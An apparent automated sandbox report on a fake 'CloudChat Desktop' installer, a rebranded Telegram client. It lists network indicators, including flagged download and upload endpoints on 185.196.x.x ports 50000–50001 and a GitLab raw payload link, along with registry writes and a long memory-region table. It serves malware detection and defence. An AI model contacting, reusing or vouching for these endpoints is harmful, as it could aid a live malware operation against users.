There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://185.196.10.235:50001/download?name=
unknown
 malicious
http://185.196.10.235:50001/download?name=user-PC
185.196.10.235
 malicious
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
unknown
https://www.cloudchat.com/Ah
unknown
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
unknown
http://httpbin.org/get
23.21.73.249
http://www.phreedom.org/md5)08:27
unknown
https://telesco.pe/
unknown
http://tools.ietf.org/html/rfc5869
unknown
https://core.CloudChat.org/api
unknown
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
unknown
https://github.com/mhammond/pywin32
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
unknown
https://www.cloudchat.com
unknown
http://www.lysator.liu.se/~alla/dia/
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
unknown
https://cc.mom/
unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
unknown
http://crl3.digi
unknown
http://www.python.org/download/releases/2.3/mro/.
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
unknown
http://bugreports.qt.io/
unknown
http://www.cc.mom/cloudchat.dog/addstickers/invalid
unknown
http://www.gribuser.ru/xml/fictionbook/2.0
unknown
https://cloudchat.comUpdate
unknown
https://twitter.com/hashtag/
unknown
https://github.com/telegramdesktop/tdesktop/blob/master/LICENSE
unknown
http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
unknown
https://telegram.org/
unknown
http://185.196.8.119:50000/upload
185.196.8.119
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
http://www.abisource.com/awml.dtd
unknown
https://www.remobjects.com/ps
unknown
http://www.freedesktop.org/standards/shared-mime-info
unknown
http://www.opengis.net/gml/3.2
unknown
https://www.innosetup.com/
unknown
http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
unknown
https://maps.google.com/maps?q=
unknown
http://tools.ietf.org/html/rfc5297
unknown
http://tools.ietf.org/html/rfc4880
unknown
https://tools.ietf.org/html/rfc3610
unknown
http://crl4.digice
unknown
http://www.python.org/dev/peps/pep-0205/
unknown
https://github.com/telegramdesktop/tdesktop/blob/master/LEGAL
unknown
https://www.cloudchat.com/
unknown
http://192.168.31.183:7890/crash.php/t?act=report
unknown
https://cloudchat.com
unknown
http://json.org
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
unknown
http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
unknown
http://xspf.org/ns/0/
unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
unknown
https://github.com/telegramdesktop/tdesktop
unknown
http://python.org/dev/peps/pep-0263/
unknown
http://www.phreedom.org/md5)
unknown
https://github.com/CloudChatdesktop/tdesktop/blob/master/LEGAL
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://core.telegram.org/api
unknown
http://schema.omg.org/spec/XMI/2.1
unknown
http://schema.omg.org/spec/XMI/2.0
unknown
http://www.tarsnap.com/scrypt/scrypt-slides.pdf
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
unknown
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
unknown
http://ocsp.thawte.com0
unknown
https://core.CC.org/api
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
unknown
https://www.cloudchat.com/4https://www.cloudchat.com/4https://www.cloudchat.com/
unknown
https://www.cloudchat.commap1map0
unknown
http://www.daa.com.au/~james/dia-shape-ns
unknown
http://www.metalinker.org/
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
unknown
https://twitter.com/
unknown
https://github.com/CloudChatdesktop/tdesktop
unknown
https://gitlab.com/deepchat2019/flsajfascol/raw/master/ajdioafd1
172.65.251.78
http://192.168.31.183:7890/crash.php?act=query_report&apiid=%1&version=%2&dmp=%3&platform=%4
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
unknown
https://github.com/CloudChatdesktop/tdesktop/blob/master/LICENSE
unknown
http://www.apache.org/licenses/LICENSE-2.0Digitized
unknown
https://tools.ietf.org/html/rfc5297
unknown
http://bugreports.qt.io/Microsoft-IIS/4.Microsoft-IIS/5.Netscape-Enterprise/3.WebLogicRocket_q_recei
unknown
https://www.ietf.org/rfc/rfc2898.txt
unknown
http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
unknown
http://www.opengis.net/kml/2.2
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
unknown
http://www.rfc-editor.org/info/rfc7253
unknown
https://cloudchat.com/0
unknown
https://instagram.com/
unknown
http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff
unknown
http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
unknown
There are 83 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.cloudchat.com
188.114.97.3
gitlab.com
172.65.251.78
httpbin.org
23.21.73.249

IPs

IP
Domain
Country
Malicious
185.196.10.235
unknown
Switzerland
malicious
185.196.8.119
unknown
Switzerland
172.65.251.78
gitlab.com
United States
66.228.63.21
unknown
United States
188.114.97.3
www.cloudchat.com
European Union
45.79.244.41
unknown
United States
103.78.229.139
unknown
China
66.228.63.175
unknown
United States
139.144.164.192
unknown
United States
139.144.164.103
unknown
United States
23.21.73.249
httpbin.org
United States
There are 1 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
Inno Setup: Setup Version
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
Inno Setup: App Path
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
InstallLocation
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
Inno Setup: Icon Group
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
Inno Setup: User
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
Inno Setup: Selected Tasks
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
Inno Setup: Deselected Tasks
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
Inno Setup: Language
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
DisplayName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
DisplayIcon
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
UninstallString
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
QuietUninstallString
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
DisplayVersion
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
Publisher
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
URLInfoAbout
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
HelpLink
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
URLUpdateInfo
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
NoModify
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
NoRepair
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
InstallDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
MajorVersion
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
MinorVersion
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
VersionMajor
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
VersionMinor
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6666-4FBF-9CA8-7A333C87D1ED}_is1
EstimatedSize
HKEY_CURRENT_USER_Classes\cloudchat
URL Protocol
HKEY_CURRENT_USER_Classes\cloudchat
NULL
HKEY_CURRENT_USER_Classes\cloudchat\DefaultIcon
NULL
HKEY_CURRENT_USER_Classes\cloudchat\shell\open\command
NULL
HKEY_CURRENT_USER_Classes\cdesktop.cc\DefaultIcon
NULL
HKEY_CURRENT_USER_Classes\cdesktop.cc\shell\open\command
NULL
HKEY_CURRENT_USER\SOFTWARE\CloudChatDesktop\Capabilities
ApplicationName
HKEY_CURRENT_USER\SOFTWARE\CloudChatDesktop\Capabilities
ApplicationDescription
HKEY_CURRENT_USER\SOFTWARE\CloudChatDesktop\Capabilities\UrlAssociations
cloudchat
HKEY_CURRENT_USER\SOFTWARE\RegisteredApplications
CloudChat Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\CloudChat_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 59 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
15A6000
heap
page read and write
6C75000
trusted library allocation
page read and write
218F91DE000
heap
page read and write
8E3000
heap
page read and write
7FF8A8AED000
unkown
page read and write
7FF8B78A5000
unkown
page readonly
2BEAFB02000
heap
page read and write
218FB317000
heap
page read and write
391000
unkown
page execute read
3002000
direct allocation
page read and write
21890010000
trusted library allocation
page read and write
8E3000
heap
page read and write
2BEAFB2C000
heap
page read and write
7FF848E30000
trusted library allocation
page read and write
DA1000
unkown
page execute read
3061000
direct allocation
page read and write
30E0000
direct allocation
page read and write
3C0000
heap
page read and write
C62A000
heap
page read and write
266D2F80000
heap
page read and write
10764000
heap
page read and write
218FB45D000
heap
page read and write
2BEAFEF1000
heap
page read and write
C860000
trusted library allocation
page read and write
DCE7000
heap
page read and write
DCE0000
trusted library allocation
page read and write
220FC9DE000
heap
page read and write
7FF8B9F74000
unkown
page read and write
2BEAFF18000
heap
page read and write
8E3000
heap
page read and write
2BEAF6B0000
direct allocation
page read and write
2BEAFF18000
heap
page read and write
15D5000
heap
page read and write
2BEAD998000
heap
page read and write
2BEAFAF6000
heap
page read and write
218F9380000
trusted library allocation
page read and write
2BEAFF18000
heap
page read and write
7FF8B7E20000
unkown
page readonly
6D60000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
1400000
heap
page read and write
878E000
heap
page read and write
2BEAFEF1000
heap
page read and write
7FF8B78B1000
unkown
page execute read
2BEAFF02000
heap
page read and write
105AC000
heap
page read and write
F740000
trusted library allocation
page read and write
2BEAD95C000
heap
page read and write
7CE8000
heap
page read and write
7FF8B8CB5000
unkown
page readonly
24E56F80000
heap
page read and write
1550000
direct allocation
page execute and read and write
6D80000
trusted library allocation
page read and write
266D2F79000
heap
page read and write
218FB073000
heap
page read and write
2BEAD9EA000
heap
page read and write
305A000
direct allocation
page read and write
2BEAFB03000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
15CA000
heap
page read and write
7FF8B9844000
unkown
page readonly
DD20000
trusted library allocation
page read and write
F750000
trusted library allocation
page read and write
C860000
trusted library allocation
page read and write
266D2F79000
heap
page read and write
2BEAFAFD000
heap
page read and write
266D2F72000
heap
page read and write
10616000
heap
page read and write
2BEAFB1F000
heap
page read and write
6C70000
trusted library allocation
page read and write
3167000
direct allocation
page read and write
2BEAFB2F000
heap
page read and write
8E3000
heap
page read and write
C860000
trusted library allocation
page read and write
7FF8B8C14000
unkown
page read and write
2BEAD9FB000
heap
page read and write
10771000
heap
page read and write
15D9000
heap
page read and write
7FF8B8794000
unkown
page read and write
7FF8B7E14000
unkown
page readonly
7FF848E12000
trusted library allocation
page read and write
266D2F80000
heap
page read and write
43B000
unkown
page read and write
266D2F79000
heap
page read and write
7FF8B93D4000
unkown
page readonly
2BEAFF01000
heap
page read and write
24E56FA0000
heap
page read and write
9B35000
heap
page read and write
7F500000
direct allocation
page read and write
F745000
trusted library allocation
page read and write
7FF8B8B11000
unkown
page readonly
43E1000
heap
page read and write
31DD000
direct allocation
page read and write
266D2F72000
heap
page read and write
218F9360000
trusted library allocation
page read and write
3164000
direct allocation
page read and write
C870000
trusted library allocation
page read and write
10713000
heap
page read and write
7FF8B7E00000
unkown
page readonly
7FF692A24000
unkown
page read and write
2BEAFB40000
direct allocation
page read and write
24E56FC4000
heap
page read and write
105A7000
heap
page read and write
10620000
heap
page read and write
2BEAFEF1000
heap
page read and write
6C81000
heap
page read and write
7FF848FC5000
trusted library allocation
page read and write
10591000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
220FCB4D000
heap
page read and write
43E3000
heap
page read and write
6D70000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
6E00000
trusted library allocation
page read and write
31B9000
direct allocation
page read and write
105C9000
heap
page read and write
C860000
trusted library allocation
page read and write
1059F000
heap
page read and write
7FF8A8B10000
unkown
page readonly
266D2F72000
heap
page read and write
266D2F72000
heap
page read and write
266D2F72000
heap
page read and write
9D9C000
heap
page read and write
154F000
stack
page read and write
218FB4B5000
heap
page read and write
3138000
direct allocation
page read and write
8E3000
heap
page read and write
8E3000
heap
page read and write
2BEAFEF1000
heap
page read and write
24E56FC5000
heap
page read and write
2BEAFB2E000
heap
page read and write
9DC0000
trusted library allocation
page read and write
2BEAD9B3000
heap
page read and write
4469000
heap
page read and write
F744000
trusted library allocation
page read and write
6EBB000
heap
page read and write
8987000
heap
page read and write
7FF8B93D6000
unkown
page readonly
F760000
trusted library allocation
page read and write
8E3000
heap
page read and write
F760000
trusted library allocation
page read and write
F760000
trusted library allocation
page read and write
2BEAFF18000
heap
page read and write
6C80000
trusted library allocation
page read and write
2BEAFEF1000
heap
page read and write
439000
unkown
page read and write
F760000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
218FB250000
heap
page read and write
2BEAFF18000
heap
page read and write
2BEAFB2D000
heap
page read and write
2BEAFF01000
heap
page read and write
7FF8B93C1000
unkown
page execute read
105DD000
heap
page read and write
2BEAFEF4000
heap
page read and write
4343000
direct allocation
page read and write
8E3000
heap
page read and write
2BEAD9EE000
heap
page read and write
4012000
unkown
page readonly
7FF8BA256000
unkown
page readonly
2BEAD9B1000
heap
page read and write
B21000
heap
page read and write
7FF8B8795000
unkown
page readonly
266D2F7E000
heap
page read and write
7FF8B7846000
unkown
page readonly
7FF8B7E60000
unkown
page read and write
F740000
trusted library allocation
page read and write
2BEAD94E000
heap
page read and write
21880001000
trusted library allocation
page read and write
C0EDDDE000
stack
page read and write
8E3000
heap
page read and write
739D000
trusted library allocation
page read and write
2BEAFAFE000
heap
page read and write
218FB980000
heap
page read and write
8E3000
heap
page read and write
2BEAFB2C000
heap
page read and write
7FF6929E0000
unkown
page readonly
7FF8B93C0000
unkown
page readonly
7FF849270000
trusted library allocation
page read and write
8E3000
heap
page read and write
7FF8B7840000
unkown
page readonly
218F93A5000
heap
page read and write
2BEAFB2C000
heap
page read and write
4461000
heap
page read and write
2BEAFA57000
heap
page read and write
7FF692A20000
unkown
page read and write
218F91D9000
heap
page read and write
218F918F000
heap
page read and write
10747000
heap
page read and write
F520000
trusted library allocation
page read and write
8E3000
heap
page read and write
2BEAFEE6000
heap
page read and write
C0EDBE3000
stack
page read and write
9DC0000
trusted library allocation
page read and write
31AB000
direct allocation
page read and write
15C8000
heap
page read and write
7F815000
direct allocation
page read and write
105BB000
heap
page read and write
2BEAFEE4000
heap
page read and write
F740000
trusted library allocation
page read and write
7FF8A8D11000
unkown
page readonly
7FF849290000
trusted library allocation
page read and write
15D4000
heap
page read and write
2BEAFAD4000
heap
page read and write
29F3000
unkown
page readonly
220FCAE1000
heap
page read and write
2BEAFF18000
heap
page read and write
218FB481000
heap
page read and write
2BEAFB2C000
heap
page read and write
7FF8A8D8C000
unkown
page readonly
F754000
trusted library allocation
page read and write
2BEAD910000
heap
page read and write
F744000
trusted library allocation
page read and write
2BEAFA00000
direct allocation
page read and write
7FF8B7E31000
unkown
page execute read
220FCB4B000
heap
page read and write
F750000
trusted library allocation
page read and write
2188022C000
trusted library allocation
page read and write
2BEAFEF1000
heap
page read and write
BD94879000
stack
page read and write
2BEAFA40000
heap
page read and write
2BEAFA41000
heap
page read and write
10629000
heap
page read and write
6C70000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
432E000
direct allocation
page read and write
2BEAFB2C000
heap
page read and write
30CA000
direct allocation
page read and write
7FF6929E1000
unkown
page execute read
2BEAFEE6000
heap
page read and write
24E56FC0000
heap
page read and write
2BEAFEE6000
heap
page read and write
218FB4DE000
heap
page read and write
220FCA85000
heap
page read and write
8E3000
heap
page read and write
2BEAFEF1000
heap
page read and write
F7F0000
trusted library allocation
page read and write
9D0000
unkown
page write copy
2BEAFF18000
heap
page read and write
9D5000
unkown
page readonly
8E3000
heap
page read and write
4360000
heap
page read and write
266D2F72000
heap
page read and write
C860000
trusted library allocation
page read and write
2BEAFF18000
heap
page read and write
2BEAFED0000
heap
page read and write
105C1000
heap
page read and write
7FF8BFAB6000
unkown
page readonly
266D2F72000
heap
page read and write
24E57010000
heap
page read and write
7FF8A8E0C000
unkown
page readonly
C860000
trusted library allocation
page read and write
DCE0000
trusted library allocation
page read and write
4325000
direct allocation
page read and write
266D2F79000
heap
page read and write
218F93A0000
heap
page read and write
2BEAFF18000
heap
page read and write
DD00000
trusted library allocation
page read and write
7FF849140000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
266D2F72000
heap
page read and write
220FCA98000
heap
page read and write
2BEAFED6000
heap
page read and write
6C70000
trusted library allocation
page read and write
105C0000
heap
page read and write
2BEAFB2B000
heap
page read and write
2BEAF870000
direct allocation
page read and write
7F824000
direct allocation
page read and write
7FF8B78B3000
unkown
page readonly
9DC0000
trusted library allocation
page read and write
9F60000
trusted library allocation
page read and write
218902EA000
trusted library allocation
page read and write
2BEAD9A7000
heap
page read and write
2A3B000
unkown
page readonly
2BEAFA00000
direct allocation
page read and write
18D0000
heap
page read and write
2BEAFF05000
heap
page read and write
105FA000
heap
page read and write
72FB000
trusted library allocation
page read and write
7FF8BFAB0000
unkown
page readonly
7FF8B7894000
unkown
page readonly
7FF8B8B3D000
unkown
page readonly
AC6000
heap
page read and write
7FF8B7E30000
unkown
page readonly
2BEAD9BD000
heap
page read and write
2BEAFB39000
heap
page read and write
18E0000
direct allocation
page read and write
2BEAFA58000
heap
page read and write
6D60000
trusted library allocation
page read and write
2BEAD9B3000
heap
page read and write
9CD000
unkown
page read and write
2BEAFF01000
heap
page read and write
2BEAF2D0000
heap
page read and write
1062C000
heap
page read and write
9B43000
heap
page read and write
7FF8B8790000
unkown
page readonly
8E3000
heap
page read and write
2BEAD988000
heap
page read and write
10668000
heap
page read and write
6EBD000
heap
page read and write
F750000
trusted library allocation
page read and write
266D2F79000
heap
page read and write
C7EE000
heap
page read and write
45F000
unkown
page readonly
743D000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
266D2F72000
heap
page read and write
7FF8B7E11000
unkown
page execute read
6D60000
trusted library allocation
page read and write
C870000
trusted library allocation
page read and write
2BEAFEF1000
heap
page read and write
218FB329000
heap
page read and write
10651000
heap
page read and write
9C0000
unkown
page read and write
8EA000
heap
page read and write
8E4000
heap
page read and write
266D2F7F000
heap
page read and write
C870000
trusted library allocation
page read and write
10605000
heap
page read and write
8E3000
heap
page read and write
F750000
trusted library allocation
page read and write
1929000
heap
page read and write
C860000
trusted library allocation
page read and write
C865000
trusted library allocation
page read and write
2BEAFEE6000
heap
page read and write
266D2F72000
heap
page read and write
7FF8B8B20000
unkown
page readonly
218FB28E000
heap
page read and write
2791000
unkown
page readonly
3113000
direct allocation
page read and write
2BEAFF18000
heap
page read and write
2BEAD9C7000
heap
page read and write
2BEAD988000
heap
page read and write
6C76000
heap
page read and write
6C70000
trusted library allocation
page read and write
7FF8B8B21000
unkown
page execute read
7FF8A8ED3000
unkown
page write copy
266D2F72000
heap
page read and write
6D70000
trusted library allocation
page read and write
2BEAFAD4000
heap
page read and write
7FF8BFAB1000
unkown
page execute read
BD9457E000
stack
page read and write
8D8000
heap
page read and write
158B000
heap
page read and write
13F0000
heap
page read and write
15E7000
heap
page read and write
2BEAFF01000
heap
page read and write
F740000
trusted library allocation
page read and write
2BEAD9ED000
heap
page read and write
2BEAD995000
heap
page read and write
105DB000
heap
page read and write
31D000
stack
page read and write
218FB64E000
heap
page read and write
2BEAD9B6000
heap
page read and write
1071D000
heap
page read and write
2BEAFEF1000
heap
page read and write
2BEAFEF1000
heap
page read and write
10717000
heap
page read and write
B21000
heap
page read and write
C0EDFCE000
stack
page read and write
14AD000
stack
page read and write
1077C000
heap
page read and write
2BEAD9EA000
heap
page read and write
8E3000
heap
page read and write
8E3000
heap
page read and write
10728000
heap
page read and write
8E3000
heap
page read and write
9F40000
trusted library allocation
page read and write
1925000
heap
page read and write
8E3000
heap
page read and write
8E3000
heap
page read and write
2BEAFF18000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
2BEAD967000
heap
page read and write
2BEAFA53000
heap
page read and write
6D60000
trusted library allocation
page read and write
8E3000
heap
page read and write
21A1000
unkown
page execute read
266D2F72000
heap
page read and write
218FAC33000
trusted library allocation
page read and write
30E8000
direct allocation
page read and write
C860000
trusted library allocation
page read and write
266D2F6B000
heap
page read and write
266D2F79000
heap
page read and write
C775000
heap
page read and write
7FF848ED0000
trusted library allocation
page execute and read and write
2BEAD9FE000
heap
page read and write
266D2F72000
heap
page read and write
2BEAFF18000
heap
page read and write
7FF848E2B000
trusted library allocation
page read and write
105F7000
heap
page read and write
266D2F79000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
2BEAFEF1000
heap
page read and write
8E3000
heap
page read and write
9C53000
heap
page read and write
BD94B3E000
stack
page read and write
7FF6929E0000
unkown
page readonly
2BEAFF01000
heap
page read and write
24E57008000
heap
page read and write
60C0000
direct allocation
page read and write
2BEAD9D6000
heap
page read and write
2BEAD998000
heap
page read and write
2BEAFEF1000
heap
page read and write
10773000
heap
page read and write
2BEAFA7D000
heap
page read and write
7FF692A26000
unkown
page readonly
8E3000
heap
page read and write
9DC0000
trusted library allocation
page read and write
105CB000
heap
page read and write
7FF8B8AF1000
unkown
page execute read
6C70000
trusted library allocation
page read and write
10595000
heap
page read and write
2BEAFEE6000
heap
page read and write
105A1000
heap
page read and write
C860000
trusted library allocation
page read and write
343B000
unkown
page readonly
266D2F72000
heap
page read and write
105E0000
heap
page read and write
2BEAD9B6000
heap
page read and write
2BEAFB80000
direct allocation
page read and write
10769000
heap
page read and write
9DC0000
trusted library allocation
page read and write
266D2F79000
heap
page read and write
AE6000
heap
page read and write
C860000
trusted library allocation
page read and write
8E3000
heap
page read and write
7FF8B8F82000
unkown
page readonly
7FF848ECC000
trusted library allocation
page execute and read and write
7FF8B8AF0000
unkown
page readonly
8E3000
heap
page read and write
DCFE000
trusted library allocation
page read and write
DD10000
trusted library allocation
page read and write
2BEAFF62000
heap
page read and write
7FF8B7DE1000
unkown
page execute read
7FF8A8991000
unkown
page execute read
310B000
direct allocation
page read and write
C860000
trusted library allocation
page read and write
8E3000
heap
page read and write
2BEAFAFF000
heap
page read and write
8E3000
heap
page read and write
7FF8B8831000
unkown
page execute read
8E3000
heap
page read and write
BD946FE000
stack
page read and write
218FAD00000
heap
page execute and read and write
7628000
trusted library allocation
page read and write
266D2F72000
heap
page read and write
711000
unkown
page execute read
105D5000
heap
page read and write
2BEADA08000
heap
page read and write
266D2F72000
